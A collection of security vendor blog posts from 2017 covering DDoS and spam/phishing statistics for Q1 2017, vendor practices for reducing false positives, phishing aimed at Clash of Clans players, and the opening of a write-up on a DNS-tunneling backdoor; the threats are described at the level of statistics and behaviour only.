In Q1 2017, the geography of DDoS attacks narrowed to 72 countries, with China accounting for 55.11% (21.9 p.p. less than the previous quarter). South Korea (22.41% vs. 7.04% in Q4 2016) and the US (11.37% vs. 7.30%) were second and third respectively.

The Top 10 most targeted countries accounted for 95.5% of all attacks. The UK (0.8%) appeared in the ranking, replacing Japan. Vietnam (0.8%, + 0.2 p.p.) moved up from seventh to sixth, while Canada (0.7%) dropped to eighth.

Distribution of DDoS attacks by country, Q4 2016 vs. Q1 2017

Statistics for the first quarter show that the 10 most targeted countries accounted for 95.1% of all DDoS attacks.

Distribution of unique DDoS attack targets by country, Q4 2016 vs. Q1 2017

Similar to the ranking for attack numbers, targets in China received much less attention from cybercriminals in Q1 2017 – they accounted for 47.78% of attacks, although China still remained the leader in this respect. In fact, the top three remained unchanged from the previous quarter despite dramatic growth in South Korea’s share (from 9.42% to 26.57%) and that of the US (from 9.06% to 13.80%).

Russia (1.55%) fell from fourth to fifth place, after its share fell by just 0.14 p.p. Hong Kong took its place (+ 0.35 p.p.). Japan and France were replaced in the Top 10 by the Netherlands (0.60%) and the UK (1.11%).

Changes in DDoS attack numbers

In Q1 2017, the number of attacks per day ranged from 86 to 994. Most attacks occurred on 1 January (793 attacks), 18 February (994) and 20 February (771). The quietest days of Q1 were 3 February (86 attacks), 6 February (95), 7 February (96) and 15 March (91). The overall decline in the number of attacks from the end of January to mid-February, as well as the downturn in March, can be attributed to the decrease in activity by the Xor.DDoS bot family, which made a significant contribution to the statistics.

Number of DDoS attacks over time* in Q1 2017

* DDoS attacks may last for several days. In this timeline, the same attack may be counted several times, i.e. one time for each day of its duration.

The distribution of DDoS activity by day of the week saw little change from the previous quarter. Saturday was the busiest day of the week in Q1 for DDoS attacks (16.05% of attacks). Monday remained the quietest day of the week (12.28%).

Distribution of DDoS attack numbers by day of the week, Q4 2016 and Q1 2017

Types and duration of DDoS attacks

In the first quarter of 2017, there was a sharp increase in the number and proportion of TCP DDoS attacks – from 10.36% to 26.62%. The percentage of UDP and ICMP attacks also grew significantly – from 2.19% to 8.71% and from 1.41% to 8.17% respectively. Meanwhile, the quarter saw a considerable decline in the share of SYN DDoS (48.07% vs. 75.33%) and HTTP (from 10.71% to 8.43%) attacks.

The increase in the proportion of TCP attacks was due to greater bot activity by the Yoyo, Drive and Nitol families. The growth in ICMP attacks is the result Yoyo and Darkrai activity. Darkrai bots also began conducting more UDP attacks, which was reflected in the statistics.

Distribution of DDoS attacks by type, Q4 2016 and Q1 2017

In the first quarter of 2017, few attacks lasted more than 100 hours. The biggest proportion of attacks lasted no more than four hours – 82.21%, which was 14.79 p.p. more than in the previous quarter. The percentage of even longer attacks decreased considerably: the share of attacks lasting 50-99 hours accounted for 0.24% (vs. 0.94% in Q4 2016); the share of attacks that lasted 5-9 hours decreased from 19.28% to 8.45%; attacks lasting 10-19 hours fell from 7% to 5.05%. Meanwhile, the proportion of attacks that lasted 20-49 hours grew slightly – by 1 p.p.

The longest DDoS attack in the first quarter lasted for only 120 hours, 172 hours shorter than the previous quarter’s maximum.

Distribution of DDoS attacks by duration (hours), Q4 2016 and Q1 2017

C&C servers and botnet types

In Q1, the highest number of C&C servers was detected in South Korea: the country’s contribution increased from 59.06% in the previous quarter to 66.49%. The US (13.78%) came second, followed by the Netherlands with 3.51%, which replaced China (1.35%) in the Top 3 countries hosting the most C&C servers. The total share of the three leaders accounted for 83.8% of all detected C&C servers.

The Top 10 also saw considerable changes. Japan, Ukraine and Bulgaria left the ranking and were replaced by Hong Kong (1.89%), Romania (1.35%) and Germany (0.81%). Of special note was China’s sharp decline: the country dropped from second place to seventh.

Distribution of botnet C&C servers by country in Q1 2017

The distribution of operating systems changed drastically in Q1: Windows-based DDoS bots surpassed the trendy new IoT bots, accounting for 59.81% of all attacks. This is the result of growing activity by bots belonging to the Yoyo, Drive and Nitol families, all of which were developed for Windows.

Correlation between attacks launched from Windows and Linux botnets, Q4 2016 and Q1 2017

The majority of attacks – 99.6% – were carried out by bots belonging to a single family. Cybercriminals launched attacks using bots from two different families in just 0.4% of cases. Attacks involving bots from three families were negligible.


Although the first quarter of 2017 was rather quiet compared to the previous reporting period, there were a few interesting developments. Despite the growing popularity of IoT botnets, Windows-based bots accounted for 59.81% of all attacks. Meanwhile, complex attacks that can only be repelled with sophisticated protection mechanisms are becoming more frequent.

In Q1 2017, not a single amplification attack was recorded, which suggests that their effectiveness has declined. We can assume that this type of attack is gradually becoming a thing of the past. Another trend evident this quarter is the rise in the number of encryption-based attacks. However, it cannot be described as significant yet.

False Positives: Why Vendors Should Lower Their Rates and How We Achieved the Best Results

Wed, 05/10/2017 - 10:14

In pursuit of a high cyberthreat detection rate, the some developers of cybersecurity solutions neglect the subject matter of false positives, and unfairly so. Indeed, this is a very inconvenient matter that some developers tend to overlook (or try to solve with questionable methods) until there is a serious incident that could paralyze the work of their customers. Unfortunately, such incidents do happen. Regretfully, only then does the idea dawn on these developers that high-quality protection from cyberthreats involves not only prevention but also a low false-positive rate.

While the minimizing the false positive rate may seem simple enough, it has, as a matter of fact, a multitude of intricacies and snags that demand significant investments, technological maturity, and resources from cybersecurity developers.

The two main reasons of false positives are:

  1. software, hardware, and human errors that all stem from the developer of the product, and
  2. the diversity of legitimate (“clean”) software that is being inspected.

The latter reason needs to be clarified.

It’s no secret that programs are written globally by millions of people with a plethora of varied qualifications (from students to experts), using various platforms and adhering to different standards. Every author has his own unique style, which sometimes leads to a situation where the program code resembles a malicious code. This triggers protection technologies, especially those that are based upon low-level binary analysis using different approaches including machine learning.

Without taking into account this peculiarity, and without implementing special technologies to minimize the occurrence of false positives, cybersecurity developers risk ignoring the “first, do not harm” principle. This, in its turn, leads to disastrous consequences (especially for large corporate customers), which can be compared to damage caused by cyberattacks.

For more than twenty years, Kaspersky Lab has been working on processes for development and testing as well as on creating technologies that minimize the rate of false positives. We take pride in having one of the best results in the industry (see tests performed by AV-Comparatives, or SE Labs) for false alarms, and we are glad to further expand on several specifics of our inner workings. I am sure that this information will allow users and corporate customers to have a more reasonable approach in selecting a cybersecurity solution. Additionally, cybersecurity developers will be able to improve and refine their processes to match the level of the world’s best practices.

We use a triple-tier quality-control system to minimize the rate of false positives, including:

  1. quality control at the design stage,
  2. quality control upon the release of a detection method, and
  3. quality control of released detection methods.

This system is being continuously improved with the help of various preventive measures.

Let us review each tier of the system in greater detail.

Quality control at the design stage

One of our fundamental principles in software development is that each technology, product, or process must contain mechanisms for minimizing the risk of false positives and consequential faults that result from them. Mistakes at the design stage turn out to be the most costly, as correcting them comprehensively may require rewriting an entire algorithm. This is why, with our years of experience, we have produced our own best practices that have allowed to decrease the rate of false positives.

For example, when developing or improving machine learning-based cyberthreat detection technology, we make sure that the technology has been learning from considerable collections of clean files with different formats. Our knowledge base for clean files (a whitelist) assists us with that. The contents of the whitelist have already exceeded 2 billion objects and are constantly collaboratively updated.

During our work, we also make sure that training and test collections of each technology are regularly updated with the most recent versions of clean files. Additionally, our products contain built-in features that minimize false positives for critical system files. Aside from that, at each detection, the product utilizes the Kaspersky Security Network (KSN) to consult the whitelist database and the certificate-reputation service to confirm that the detected file is not a clean one.

However, technologies and products aside, there is also a human factor.

A cybersecurity analyst, a developer of an expert system, or a data analyst might make mistakes at any stage. So, there is room for miscellaneous blocking checks by additional automated systems.

Quality control at the release of a detection method

Before the delivery to users, new methods of cyberthreat detection pass several more test stages.

The greatest protective barrier is the infrastructure system for false positive testing, which works with two collections.

The first collection, which is a critical set, comprises files that are taken from popular operating systems (released for different platforms with different localizations), updates of those systems, office applications, drivers, and our own products. This set of files is routinely supplemented.

The second collection contains a dynamically formed set of files, which includes the most popular files. The size of this collection is chosen by finding a balance between the volume of scanned files (as a consequence, the number of servers), the run time of this scan (hence, the time of delivery of detection methods to users), and the number of potentially affected computers in case of a false positive.

For the time being, the number of files in both collections surpasses 120 million (this is approximately 50 TB of data). Considering the fact that these files are scanned every hour after each release of the database updates, we may infer that the infrastructure checks over 1.2 PB of data for false positives each day.

More than 10 years ago, we were among the first ones in the field of cybersecurity to implement non-signature-based methods of detection that leveraged behavioral analysis, machine learning, and other promising generic technologies. These methods have proven their effectiveness, especially in overcoming sophisticated cyberthreats. However, they require particularly thorough testing for false positives.

For example, behavioral detection allows for the neutralization of a malicious application that has manifested some traits of a malicious behavior during its operation. In order to prevent a false positive for the behavior of clean files, we have created a “farm” of computers, which bring about various user scenarios.

The “farm” offers different combinations of operating systems and popular software. Before releasing each new non-signature-based detection method, we dynamically check it at this “farm” with standard and unique scenarios.

Last but not least, cybersecurity developers should also pay attention to test their web scanners for false positives. A website blocked by mistake can also disrupt the work of a customer, which is not acceptable.

To minimize the number of such incidents, we have developed automated systems to download up-to-date content daily from 10,000 of the most popular websites and scan this content to test for false positives. The most accurate results are achieved by using the most popular versions of common browsers and by using proxies in different geo locations to exclude location-dependent content.

Quality control of released detection methods

Detection methods that have been delivered to users are monitored day and night by the automated systems, which monitor the methods for any behavioral anomalies.

The thing is the dynamics of a detection that triggers a false positive often differs from the dynamics of a detection of a genuinely malicious file. Our genuine automated system monitors these anomalies, and if there is something suspicious, then the system will request an analyst to run an additional check for this detection. If suspicions are very strong, then our automated system turns off the detection method through KSN and immediately informs analysts about it. In addition, there are three teams of cybersecurity analysts on duty in Seattle, Beijing, and Moscow who work shifts around the clock to monitor the situation and quickly resolve emerging incidents. This is Humachine Intelligence in action.

In addition to detecting anomalies, the automated systems monitor performance data, errors in module operation, and potential problems based on diagnostic data received from users over KSN. This allows us to detect potential problems at early stages and eliminate them before their effect becomes noticeable for users.

In case the incident has occurred after all and cannot be closed by disabling an individual detection method, then urgent actions are taken to rectify the situation and allow the problem to be solved quickly and effectively. In this case, we may roll back the databases to a stable release that does not require any additional testing. To be honest, we have not resorted to this method in practice, as there has been no occasion for that thus far. In fact, we’ve only ever used it during our training exercises.

Speaking of training exercises…

Prevention is better than a cure

Not everything can be foreseen, and even if every eventuality were provided for, it would be good to know how certain measures would work in practice. Waiting for a real incident to happen isn’t necessary, as there is always the option of modeling.

Periodically, we conduct internal training exercises to confirm the “combat readiness” of our staff and the effectiveness of our methods for preventing false positives.

The training exercises are focused on full-blown imitation of diverse emergency scenarios in order to see if all of the systems and experts act according to plan. Several divisions of technical and service departments are simultaneously involved in the training exercises. These exercises are scheduled for a weekends and are based on a scrupulously thought-out scenario.

After training, we analyze each division for its performance, improve the documentation and implement changes for the involved systems and processes.

Sometimes during the training process, we discover new risks that had previously gone unnoticed. A more systematic discovery of those risks is achieved through brainstorming potential problems in the areas of technologies, processes and products. After all, technologies, processes, and products are constantly being developed, and any change brings about new risks.

Finally, we work systematically on eradicating root causes for all of the incidents, risks, and problems that were uncovered during our training exercises.

It goes without saying that all of the systems that are responsible for quality control are duplicated and are maintained day and night by the team of experts on duty. A fault in any one system will lead to transitioning over to a duplicate system while the fault itself is immediately addressed.


False positives cannot be avoided completely, but it is possible to lower their rate considerably to minimize their aftermath. This does require substantial investments, technological maturity, and resources from developers of cybersecurity solutions. Yet, these efforts provide a smooth experience for our users and corporate clients. These efforts are imperative and are within the scope of duties of each reliable developer.

Reliability is our creed. Instead of relying on one protection technology, we employ a multi-tier security approach. Protection against false positives is arranged in the same way – it is multi-tiered and duplicated multiple times. There is no other way since we are talking about the high-quality protection of our customers’ infrastructure.

At the same time, we succeed in finding and maintaining the optimal balance between the highest level of protection against cyberthreats and the the lowest level of false positives. This is confirmed by the results of independent tests in 2016:, a German test laboratory, gave Kaspersky Endpoint Security eight awards at the same time, including Best Protection 2016 and Best Usability 2016.

In conclusion, I would like to note that high quality is not a result that ought to be achieved only once. This is a process that requires constant supervision and improvement, especially where the price of a possible mistake means the disruption of a customer’s business processes.

Clash of Greed

Thu, 05/04/2017 - 04:57

In 2015, the game Clash of Clans was bringing in about 1.5 million dollars per day for its developer, Supercell. Later on, the company launched a new project, Clash Royale, after addressing the flaws of their first game and implementing battles with real players into the new game, which shares the same characters and the same cartoonish design as the first project. Yet, the more popular game is, the higher the probability that fraudsters will be looking to make a fortune on that popularity by, for example, organizing phishing attacks on the player base.

The money-making model for both of the games has been thoroughly thought-out: anyone can play without investing real money. But this would mean putting a lot of effort into the games and losing more often to other players who basically purchase and upgrade either rare and strong cards with extremely low drop rates or battle units and building levels (when talking about Clash of Clans). In this regard, the majority of the game’s players do not have much money but are full of ambition. These players often seek not-so-legal ways to procure and upgrade rare cards to put less effort into winning battles and ranking up to play in the premier leagues.

This has been exploited by fraudsters, who subtly abuse human foibles such as cupidity, love for freebies, and the desire to be the top player. Phishing attacks, though always quite similar in their nature, are very competently planned. Phishing websites are designed with holidays in mind (either New Year’s Eve or Christmas) or are linked to game updates that include additions to the game or changes in the game’s mechanics (new cards, units, balancing, etc.).

Here, for example, is the headline of a phishing website targeted at Clash of Clans players. It was designed specially for New Year’s Eve, and, according to the published description, the developer of the game supposedly gives out New Year’s gifts to players, including game currency, building level upgrades, etc.

The address of the website contains the phrase “eventchristmasandnewyear”, which makes the website look even more credible.

Victims can choose what they want from a list that includes gold, crystals, resources, and building upgrades.

The intention of the fraudsters becomes obvious as early as at the next step, where victims are prompted fill out a form by entering the credentials of their Google and Facebook accounts. After that, these credentials are passed on to the fraudster and the victims are robbed of both of their accounts.

The form created by the fraudsters offers “authorization” with Google and Facebook credentials

Also, fraudsters reacted quickly to the release of the latest updates, which included new battle arenas and legendary cards. On behalf of Supercell, players were offered their choice of one of the “legendaries”, as well as gold and crystals. Of course, in order to obtain these, Google and Facebook credentials were required.

One of their recent releases was “a gift from the developers”, which gives the player the option of selecting their desired hero or resources

Input fields for credentials

After sending the credentials, the victim receives a message to confirm their registration. It can be assumed that the evildoers may need this to ascertain the authenticity of the user-specified credentials.

To avoid falling victim to this fraudulent scheme, it is a good idea to follow these simple rules: do not use any links from social network groups, especially if the groups are not official, or from e-mail messages received from unknown users, even though they may promise you progress in the game or imminent profit. It certainly couldn’t hurt to install good security software that features anti-phishing functionality with database updates on malicious and phishing links that cover every subject. If the “free lunch” being offered proves to be too tempting, then go to the game developer’s official website and verify whether the holiday offer is genuine.

Spam and phishing in Q1 2017

Tue, 05/02/2017 - 04:57

Spam: quarterly highlights Spam from the Necurs botnet

We wrote earlier about a sharp increase in the amount of spam with malicious attachments, mainly Trojan encryptors. Most of that spam was coming from the Necurs botnet, which is currently considered the world’s largest spam botnet. However, in late December 2016, the network’s activity almost ceased completely and, as time showed, it wasn’t just a break for the festive season. The volume of spam sent from this botnet remained at an extremely low level for almost the entire first quarter of 2017.

In Q1 2017, the percentage of spam in email traffic amounted to 55.9%.


Why has Necurs stopped distributing spam? We know that the botnet is active and the bots are waiting for commands. Perhaps the criminals behind the botnet got scared by all the fuss made about encryptors and decided to temporarily suspend their mass mailings.

We still continue to register malicious mass mailings from what is presumably the Necurs botnet, though their volume is a fraction of the amount recorded in December:

The number of malicious messages caught by our traps that were presumably sent by the Necurs botnet

As before, the emails usually imitate various types of bills and other official documents:

The email above contained an attached MSWord document with macros that downloaded the Rack family encryptor (detected as Trojan.NSIS.Sod.jov) to the victim machine.

In addition to malicious mailings from the botnet, we came across a mass mailing about pump-and-dump stock schemes:

As a rule, mass mailings exploiting this subject are distributed in huge volumes over a very short period of time. This is because the fraudsters have to pump and dump shares quickly, before their scams are discovered on the stock exchange. This type of stock fraud is against the law, so cybercriminals try to wind up the affair within a couple of days. The Necurs botnet is ideal for this sort of scam due to its size – according to estimates, it currently exceeds 200,000 bots.

The average share of spam in Russia’s email traffic in Q1 2017 was 61.6%.


Does this sharp drop mean we have reached peak crypto-spam mass mailing and it’s about to disappear? Unfortunately, no.

The total volume of malware detected in email decreased, but not that dramatically – 2.4 times less than the previous quarter.

The number of email antivirus detections, Q4 2016 vs Q1 2017

Malicious mass mailings are still being sent out and, although their volume has decreased, cybercriminals are using a variety of techniques to deceive both security solutions and users.

Malicious emails with password-protected archives

In the first quarter we observed a trend towards packing malware into password-protected archives to complicate detection of malicious emails.

All the classic tricks were used to make potential victims open the archives: fake notifications about orders from large stores, various bills, money transfers, resumes, or the promise of lots of money.

The attached archives usually contained office documents with macros or JavaScript scripts. When launched, the files downloaded other malicious programs on the user’s computer. Interestingly, after the decline in Necurs botnet activity, the harmful “payload” that spread via spam became much more diverse. The cybercriminals sent out ransomware and spyware, backdoors and a new modification of the infamous Zeus Trojan.

The attachments above contain Microsoft Word documents with macros that download several different modifications of a Trojan encryptor belonging to the Cerber family from onion domains in different zones. This malicious program selectively encrypts data on the user’s computer and demands a ransom for decrypting it via a site on the Tor network.

The archive in the message above contains the Richard-CV.doc file with macros that downloads representatives of the Fareit spyware family from the domain. These malicious programs collect confidential information about the user and send it to the remote server.

There was yet another case involving downloadable spyware, this time from the Pinch family. The Trojan collects passwords, email addresses, information about the system configuration and registry settings. Among other things, it harvests information from instant messaging services and mail clients. The obtained data is encrypted and sent to the criminals by email. According to our information received from KSN, the program is most widespread in Russia, India and Iran.

Most email antivirus detections occurred in China – 18% of all spam.


It’s worth pointing out that this spyware was spread using fake business correspondence. Emails were sent out using the names of real small and medium businesses with all the relevant signatures and contacts, rather than using the name of some made-up organization.

Unlike other emails, the example above does not contain a password-protected archive. The request to enter a password is just a trick: the fraudsters want the user to enable Microsoft Word macros to run the malicious script.

The contents of the email above include a password-protected document with a script in Visual Basic that downloads the Andromeda bot on the victim machine. The latter establishes a connection with the command center and waits for commands from the owners. It has broad functionality and can download other malicious programs on the user’s computer.

This fake notification from an e-store contains a malicious script. On entering the password and launching the malicious content, the Receipt_320124.lnk file is created in the %TEMP% catalogue. It, in turn, downloads a Trojan-banker of the Sphinx family, which is a modification of the older and infamous Zeus, on the victim computer.

As we can see, very different mass mailings with malicious attachments now contain files packed in a password-protected archive. Most likely, this trend will continue: a password-protected document is likely to appear more trustworthy to the user, while causing problems for security solutions.

Spam via legal services

Modern virtual platforms for communication (messengers, social networks) are also actively used by spammers to spread advertising and fraudulent offers. Cybercriminals register special accounts for spamming in social networks and to make their messages look more authentic they use techniques similar to those used in traditional mass mailings (for example, the personal data from the account and that sent in the email are the same). The same type of spam, for example, ‘Nigerian letters’, offering earnings, etc. can be distributed via email traffic and social networks. A notification about a message is usually sent to the recipient’s email address; in this case, the technical header of the email is legitimate, and it is only possible to detect the spam by the contents of the message. Spam distributed directly via email, can be easily detected by technical headers. The same cannot be said for messages sent via legitimate services, especially if the address of the service is added to the user’s list of trusted addresses.

Today’s email spam filters can cope effectively with the task of detecting spam that is sent in the traditional way, so spammers are forced to look for new methods to bypass filters.

Holidays and spam

The first quarter of 2017 saw festive spam dedicated to New Year, St. Patrick’s Day, Easter and Valentine’s Day. Small and medium-sized businesses advertised their services and products and offered holiday discounts. Offers from Chinese factories were timed to coincide with the Chinese New Year, which was celebrated in mid-February.

Spammers also sent out numerous offers to participate in a survey and get coupons or gift cards from major online stores, hoping to collect the recipients’ personal information and contact details.

Burst of B2B spam

In the first three months of 2017, we also recorded a large number of mass mailings containing offers to buy company databases from specific industries. This type of spam remains popular with spammers and primarily targets companies or individual representatives of large businesses rather than ordinary users. Therefore, these messages are sent mainly to people or companies from a list of contacts or addresses for a particular business segment that is obtained, as a rule, in the same way – via spam.

The offers are sent on behalf of firms or their representatives, but they are often completely impersonal.

Spammers have databases of companies for any business segment, as well as the contact details of participants at major exhibitions, seminars, forums and other events. To make recipients interested in their offers, spammers often send several free contacts from their collections.

Statistics Proportion of spam in email traffic

Percentage of spam in global email traffic, Q4 2016 and Q1 2017

Compared to Q4 2016, there was a decline in the overall proportion of spam in global email traffic in the first three months of 2017. In January, the proportion fell to 55.05%, while in February the share was even lower – 53.4%. However, in March the level of spam showed an upward trend, rising to 56.9%. As a result, the average share of spam in global email traffic for the first quarter of 2017 was 55.9%.

Percentage of spam in Russia’s email traffic, Q4 2016 and Q1 2017

The spam situation in the Russian segment of the Internet was somewhat different from the global one. In January 2017, the proportion of junk email increased to almost 63% and stayed in the 60-63% range until the end of the quarter. In February, as was the case with overall global traffic, there was a decline – to 60.35% – followed by an increase to 61.65% in March. The average share of spam in Russian email traffic in the first quarter of 2017 was 61.66%.

Sources of spam by country

Sources of spam by country, Q1 2017

In the first quarter of 2017, the US remained the leading source of spam – its share accounted for 18.75%. Representatives from the Asia-Pacific region – Vietnam (7.86%) and China (7.77%) – came second and third.

Trojan-Downloader.JS.Agent remained the most popular malware family spread via email.


Germany was the fourth biggest source, responsible for 5.37% of world spam, followed by India (5.16%). Russia, in sixth place, accounted for 4.93% of total spam.

The top 10 biggest sources also included France (4.41%), Brazil (3.44%), Poland (1.90%) and the Netherlands (1.85%).

Spam email size

Breakdown of spam emails by size, Q4 2016 and Q1 2017

In Q1 2017, the share of small emails (up to 2 KB) in spam traffic decreased considerably and averaged 29.17%, which is 12.93 p.p. less than in the fourth quarter of 2016. The proportion of emails sized 2–5 KB (3.74%) and 5–10 KB (7.83%) also continued to decline.

Meanwhile, the proportion of emails sized 10-20 KB (25.61%) and 20-50 KB (28.04%) increased. Last year’s trend of fewer super-short spam emails and more average-sized emails has continued into 2017.

Malicious attachments in email Top 10 malware families

Trojan-Downloader.JS.Agent (6.14%) once again topped the rating of the most popular malware families. Trojan-Downloader.JS.SLoad (3.79%) came second, while Trojan-PSW.Win32.Fareit (3.10%) completed the top three.

TOP 10 malware families in Q1 2017

The Backdoor.Java.Adwind family (2.36%) in fifth place is a cross-platform multifunctional backdoor written in Java and sold on DarkNet as malware-as-a-service (MaaS). It is also known under the names of AlienSpy, Frutas, Unrecom, Sockrat, JSocket, and jRat. It is typically distributed via email as a JAR attachment.

A newcomer – Trojan-Downloader.MSWord.Cryptoload (1.27%) – occupied ninth place. It’s a JS script containing malware, which it installs and runs on the computer.

Trojan-Downloader.VBS.Agent (1.26%) rounded off the Top 10.

Countries targeted by malicious mailshots

Distribution of email antivirus verdicts by country, Q1 2017

In Q1 2017, China (18.23%) was the country targeted most by malicious mailshots. Germany, last year’s leader, came second (11.86%), followed by the UK (8.16%) in third.

Italy (7.87%), Brazil (6.04%) and Japan (4.04%) came next, with Russia occupying seventh place with a share of 3.93%. The US was in ninth place with (2.46%), while Vietnam (1.94%) completed the Top 10.


In the first quarter of 2017, the Anti-Phishing system was triggered 51,321,809 times on the computers of Kaspersky Lab users. Overall, 9.31% of unique users of Kaspersky Lab products worldwide were attacked by phishers in Q1 2017.

Geography of attacks

China (20.88%) remained the country where the largest percentage of users is affected by phishing attacks, although its share decreased by 1.67 p.p.

Geography of phishing attacks*, Q1 2017

* Number of users on whose computers the Anti-Phishing system was triggered as a percentage of the total number of Kaspersky Lab users in the country

The percentage of attacked users in Brazil decreased by 0.8 p.p. and amounted to 19.16%, placing the country second in this ranking. Macao added 0.91 p.p. to the previous quarter’s figure and came third with 11.94%. Russia came fourth with 11.29% (+0.73 p.p.), followed by and Australia on 10.73% (-0.37p.p).

TOP 10 countries by percentage of users attacked

Country % China 20.87% Brazil 19.16% Macao 11.94% Russia 11.29% Australia 10.73% Argentina 10.42% New Zealand 10.18% Qatar 9.87% Kazakhstan 9.61% Taiwan 9.27%

Argentina (10.42%, +1.78 p.p.), New Zealand (10.18%), Qatar (9.87%), Kazakhstan (9.61%) and Taiwan (9.27%) completed the top 10.

Organizations under attack Rating the categories of organizations attacked by phishers

The rating of attacks by phishers on different categories of organizations is based on detections of Kaspersky Lab’s heuristic anti-phishing component. It is activated every time a user attempts to open a phishing page while information about it has not yet been included in Kaspersky Lab’s databases. It does not matter how the user attempts to open the page – by clicking a link in a phishing email or in a message on a social network or, for example, as a result of malware activity. After the security system is activated, a banner is displayed in the browser warning the user about a potential threat.

In Q1 2017, the ‘Banks’ (25.82%, -0.53 p.p.), ‘Payment systems’ (13.6%, +2.23 p.p.) and ‘Online stores’ (10.89%, +0.48 p.p.) categories accounted for more than half of all registered attacks. The total share of ‘Financial organizations’ was a little over 50% of all phishing attack

Distribution of organizations affected by phishing attacks by category, Q1 2017

In addition to financial organizations, phishers most often targeted ‘Global Internet portals’ (19.1%), although their share decreased by 5.25 p.p. from the previous quarter. ‘Social networking sites’ (9.56%) and ‘Telecommunication companies’ (5.93%) also saw their shares fall by 0.32 p.p. and 0.83 p.p. respectively. The percentage of the ‘Online games’ category accounted for 1.65% while the figure for ‘Instant messaging’ was 1.53%.

TOP 3 attacked organizations

Fraudsters continue to focus most of their attention on the most popular brands, enhancing their chances of a successful phishing attack. More than half of all detections of Kaspersky Lab’s heuristic anti-phishing component are for phishing pages using the names of fewer than 15 companies.

In Q1 2017, Kaspersky Lab products blocked 51 million attempts to open a phishing page.


The TOP 3 organizations attacked most frequently by phishers remained unchanged for the second quarter in a row. Yahoo! was once again the organization whose brand was mentioned most often on phishing pages (7.57%, – 1.16 p.p.). Facebook (7.24%), whose share fell by 0.13 p.p., was second, while Microsoft (5.39%, -0.83 p.p.) came third.

Organization % of detected phishing links Yahoo! 7.57 Facebook 7.24 Microsoft Corporation 5.39

In order to reach the widest possible audience with one attack, scammers often mention a variety of brands expecting the victims to react to at least one of them. This is facilitated by authentication with existing accounts, which many Internet services use trying to make life easier for their users. Therefore, a page offering to use different accounts to enter a site does not arouse suspicions. This allows fraudsters to steal user data from several different resources using just one phishing page.

Phishing page prompting the user to login via the accounts of other web resources to access a file

This phishing page uses a similar trick under the pretext of accessing the Google Drive service

Hot topics this quarter Payment systems

In the first quarter Q1 2017, 13.6% of detections of Kaspersky Lab’s heuristic anti-phishing component fell under the ‘Payment Systems’ category. It means that every eighth attack targeted this category, which has been popular with phishers for several quarters now.

PayPal (28.25%) came first on the list of attacked payment systems, followed by Visa (25.78%) and American Express (24.38%).

Organization %* PayPal 28.25 Visa Inc. 25.78 American Express 24.38 MasterCard International 16.66 Others 4.94

* The percentage of attacks on an organization as a total of all attacks on organizations from the ‘Payment Systems’ category

The goal of phishers attacking customers of popular payment systems is to get personal and payment data, login details for accounts, etc. Criminals often place fraudulent content on reputable resources in order to gain the trust of the user and bypass blacklisting. For example, we came across a fake PayPal support page located on the Google Sites service (the primary domain is After clicking on the banner, the user is redirected to a phishing page, where they are asked to enter their account data for the payment system.

Phishing page using the PayPal brand located on the Google domain

Another trick used by phishers is to place phishing content on the servers of government agencies. This is possible because a significant number of government agencies do not pay much attention to the security of their web resources.

Phishing page using the PayPal brand located on a server belonging to Sri Lankan government

Phishing page using the PayPal brand located on a server belonging to the Bangladesh government

Emails threatening to block an account or asking to update data in a payment system were used as bait.

Online stores

Every tenth phishing attack targeted users of online stores. In Q1 2017, Amazon (39.13%) was the most popular brand with phishers.

Organization % Online Shopping 39.13 Apple 15.43 Steam 6.5 eBay 5.15 Alibaba Group 2.87 Taobao 2.54 Other targets 28.38

By using the Amazon brand, cybercriminals are trying not only to steal login data but also all the personal information of the user, including their bank card details. Also, they often place fake pages on domains that have a good reputation (for example, on a domain owned by Vodafone).

Phishing page using the Amazon brand located on the Vodafone domain

Earning money with anti-phishing

In addition to standard phishing emails and pages, we often come across other methods of tricking users. Scammers often exploit people’s desire to make easy money by offering cash to view advertising, automatic stock trading programs and much more.

Spam emails offering quick money on the Internet

In the first quarter of 2017, we saw a rather interesting fraudulent resource which claimed to be combating phishing sites. All you had to do if you wanted to make some quick cash was to register and perform several tasks, the essence of which was to evaluate web pages using the following options: malicious, safe, does not load. Only the content of the page was evaluated, while its address was not displayed.

After checking 31 sites, it turned out that $7 needed to be paid to withdraw the money that was earned

For each ‘checked’ site, the user earned about $3. To withdraw that money, they had to transfer $7 to the owners of the resource as confirmation that they were an adult and financially solvent. Of course, no ‘earnings’ were ever received after that.


Although the beginning of Q1 2017 was marked by a decline in the amount of spam in overall global email traffic, in March the situation became more stable, and the average share of spam for the quarter amounted to 55.9%. The US (18.75%) remained the biggest source of spam, followed by Vietnam (7.86%) and China (7.77%).

The first quarter of 2017 was also notable for the decrease in the volume of malicious spam sent from the Necurs botnet: the number of such mass mailings decreased significantly compared to the previous reporting period. However, the lull may be temporary: the attackers may have decided to suspend mass mailings until all the hype about encryptors subsides.

Trojan-Downloader.JS.Agent (6.14%) once again topped the rating of the most popular malware families detected in email. Trojan-Downloader.JS.SLoad (3.79%) came second, while Trojan-PSW.Win32.Fareit (3.10%) completed the top three.

In Q1 2017, the Anti-Phishing system was triggered 51,321,809 times on the computers of Kaspersky Lab users. China (20.88%) topped the rating of countries most often attacked by phishers. Financial organizations remained the main target for phishers, and we expect this trend to continue in the future.

Use of DNS Tunneling for C&C Communications

Fri, 04/28/2017 - 05:59

Say my name.!

You are goddamn right.

Network communication is a key function for any malicious program. Yes, there are exceptions, such as cryptors and ransomware Trojans that can do their job just fine without using the Internet. However, they also require their victims to establish contact with the threat actor so they can send the ransom and recover their encrypted data. If we omit these two and have a look at the types of malware that have no communication with a C&C and/or threat actor, all that remains are a few outdated or extinct families of malware (such as Trojan-ArcBomb), or irrelevant, crudely made prankware that usually does nothing more than scare the user with screamers or switches mouse buttons.

Malware has come a long way since the Morris worm, and the authors never stop looking for new ways to maintain communication with their creations. Some create complex, multi-tier authentication and management protocols that can take weeks or even months for analysists to decipher. Others go back to the basics and use IRC servers as a management host – as we saw in the recent case of Mirai and its numerous clones.

Often, virus writers don’t even bother to run encryption or mask their communications: instructions and related information is sent in plain text, which comes in handy for a researcher analyzing the bot. This approach is typical of incompetent cybercriminals or even experienced programmers who don’t have much experience developing malware.

However, you do get the occasional off-the-wall approaches that don’t fall into either of the above categories. Take, for instance, the case of a Trojan that Kaspersky Lab researchers discovered in mid-March and which establishes a DNS tunnel for communication with the C&C server.

The malicious program in question is detected by Kaspersky Lab products as Backdoor.Win32.Denis. This Trojan enables an intruder to manipulate the file system, run arbitrary commands and run loadable modules.


